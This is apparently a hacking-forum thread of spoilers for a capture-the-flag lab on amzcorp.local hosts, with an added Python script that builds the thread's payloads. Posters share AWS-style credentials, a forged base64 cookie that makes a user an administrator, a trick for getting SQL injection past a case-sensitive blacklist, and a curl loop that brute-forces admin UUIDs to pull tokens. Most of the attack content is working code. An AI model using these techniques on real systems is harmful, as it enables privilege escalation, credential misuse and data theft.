(July 15, 2022, 03:46 PM) fironeDerbert Wrote: There are creds in the git:
[code]
ecs = boto3.client(
    'ecs',
    aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",
    aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",
    region_name="eu-east-1",
    endpoint_url='http://cloud.amzcorp.local',
)
[/code]
You can use them like this:
[code]
apt-get install awscli
aws configure   # enter the creds when prompted
aws --endpoint-url http://cloud.amzcorp.local ecs help
[/code]
These creds are useless. Focus on custom_jwt.py; you can exploit this ecdsa library. It is crypto shit and I'm stuck here. If you are good at crypto then maybe you can find flag 4, and that JWT is created here: http://company-support.amzcorp.local

(July 15, 2022, 03:59 PM) hacker1111 Wrote: (July 15, 2022, 03:46 PM) fironeDerbert Wrote: There are creds in the git:
[...] Is custom_jwt.py for getting flag 4 or flag 3?

(July 15, 2022, 04:06 PM) fironeDerbert Wrote: (July 15, 2022, 03:59 PM) hacker1111 Wrote: (July 15, 2022, 03:46 PM) fironeDerbert Wrote: There are creds in the git:
[...] Is custom_jwt.py for getting flag 4 or flag 3?
flag 4
flag 3 is in the SQL DB. Dump the keys_tbl table.

Any hint to dump the database?

July 16, 2022 at 11:09 AM
(July 16, 2022, 09:34 AM) fironeDerbert Wrote: Any hint to dump the database?

Line 521, file name routes.py, full path dea918ebb439498bf14e448e65ca960883900254/jobs_portal/apps/home/routes.py. There is a function update_user; you can update the logged-on user to administrator on jobs.amzcorp.local by logging in as tyler and using his cookies:
[code]
{"username":"mceye","email":"mceye@amzcorp.local","role":"Administrators"}
[/code]
then base64:
[code]
{"update_user":"eyJ1c2VybmFtZSI6Im1jZXllIiwiZW1haWwiOiJtY2V5ZUBhbXpjb3JwLmxvY2FsIiwicm9sZSI6IkFkbWluaXN0cmF0b3JzIn0="}
[/code]
Then, on the search, the username= parameter is SQL injectable, but it has blacklisted characters and strings:
[code]
blacklist = ["0x", "**", "ifnull", " or ", "union"]
[/code]
Do it manually, e.g. using uppercase.

July 16, 2022 at 11:26 PM
[quote="hacker1111" pid="146001" dateline="1657645911"]
[code]
for i in {950..975}; do
  echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64
done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" \
  --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"
[/code]
[code]
Early Access Flag
[/code]
[/quote]
Hey! Does this still work? I tried with a bigger range, but I'm always getting an HTML response with "403" and "Access denied", etc. Any help? Thanks!
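As an added example (not code from the thread or from the target application), here is a Python script that builds the two encoded artefacts discussed in the posts above: the forged update_user cookie from the routes.py post, and the base64 "data" envelope that the quoted tokens/get loop sends, together with the blacklist check the SQLi hint describes, in its naive case-sensitive form beside a case-folded version. Assumptions not stated on the page: the inner JSON is serialised without whitespace (the base64 string quoted in the post decodes to exactly that), the blacklist is applied as a plain case-sensitive substring match (which is why uppercase gets past it), the injection payload and its column count are constructed only to exercise the filter, and no HTTP request is made.

```python
"""Added example, not code from the thread or from the jobs portal."""
import base64
import json

# Blacklist exactly as quoted in the routes.py post.
BLACKLIST = ["0x", "**", "ifnull", " or ", "union"]


def b64_json(obj: dict) -> str:
    """Compact JSON (no whitespace) encoded as base64 text.

    Assumption: both endpoints expect the inner JSON serialised without
    spaces; the base64 string quoted in the post decodes to exactly that.
    """
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


def build_update_user_cookie(username: str, email: str, role: str) -> str:
    """Cookie value for the update_user path: {"update_user": base64(user JSON)}."""
    inner = b64_json({"username": username, "email": email, "role": role})
    return json.dumps({"update_user": inner}, separators=(",", ":"))


def build_get_token_body(uuid: int, username: str = "admin") -> str:
    """POST body for /api/v4/tokens/get, mirroring the posted shell loop:
    {"data": base64('{"get_token":"True","uuid":<int>,"username":"admin"}')}.
    uuid is a bare integer, exactly as the loop interpolates $i."""
    inner = b64_json({"get_token": "True", "uuid": uuid, "username": username})
    return json.dumps({"data": inner}, separators=(",", ":"))


def decode_data_field(body: str) -> dict:
    """Inverse of build_get_token_body: what the server sees after unwrapping."""
    return json.loads(base64.b64decode(json.loads(body)["data"]))


def is_blocked_naive(value: str) -> bool:
    """Case-sensitive substring match: the behaviour the 'use uppercase'
    hint implies (assumption; the real filter code is not on the page)."""
    return any(bad in value for bad in BLACKLIST)


def is_blocked_hardened(value: str) -> bool:
    """Same blacklist after case-folding and whitespace normalisation.
    Closes the upper-case trick only; '||' and similar still pass, which is
    why a parameterised query, not a blacklist, is the actual fix."""
    norm = " ".join(value.casefold().split())
    return any(bad in norm for bad in BLACKLIST)


if __name__ == "__main__":
    # Values from the routes.py post.
    print(build_update_user_cookie("mceye", "mceye@amzcorp.local", "Administrators"))
    # Same uuid range as the posted loop.
    for uuid in range(950, 976):
        print(build_get_token_body(uuid))
    # Constructed payload for the filter check; the column count is made up.
    payload = "tyler' UNION SELECT 1,2,3-- -"
    print("naive filter blocks payload:", is_blocked_naive(payload))
    print("hardened filter blocks payload:", is_blocked_hardened(payload))
```

Running it prints the cookie value exactly as it appears in the post and the 26 request bodies the loop would send. The shell pipeline in the thread relies on `base64` emitting a single line; that holds because the 50-byte get_token JSON encodes to 68 characters, under the default 76-column wrap. The hardened filter shows the limit of the approach: `'||1` still passes it, so the fix on the server side is a parameterised query, not a longer blacklist.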
July 17, 2022 at 12:16 AM
[quote="ethicalhunt3r" pid="154861" dateline="1658013994"][quote="hacker1111" pid="146001" dateline="1657645911"][...][/quote]Hey! Does this still work? [...][/quote]
Yes, still works. Did you create an account previously in jobs? Then replace it with that account's cookie value.

[quote="ethicalhunt3r" pid="154861" dateline="1658013994"][quote="hacker1111" pid="146001" dateline="1657645911"][...][/quote]Hey! Does this still work? [...][/quote]
Yes, it's still working. BTW, no need to use a for loop; I added the for loop in case they change the admin UUID.
[code]
echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"
[/code]

(July 15, 2022, 04:10 PM) hacker1111 Wrote: (July 15, 2022, 04:06 PM) fironeDerbert Wrote: (July 15, 2022, 03:59 PM) hacker1111 Wrote: (July 15, 2022, 03:46 PM) fironeDerbert Wrote: There are creds in the git:
[...] Is custom_jwt.py for getting flag 4 or flag 3?
flag 4
flag 3 is in the SQL DB. Dump the keys_tbl table.

Any chance you could help with flag 3? Can't seem to get my SQLi to work..

July 17, 2022 at 10:03 AM
Any chance someone could help with how to extract the base64.c00.xyz in "logs.amzcorp.local"? Tried different kinds of grep, jq, even Notepad++.
nvm ... managed to extract them using transpose paste in Excel :)
But couldn't find any flag, just parts of the passwd file and cron...
nvm ... got the flag...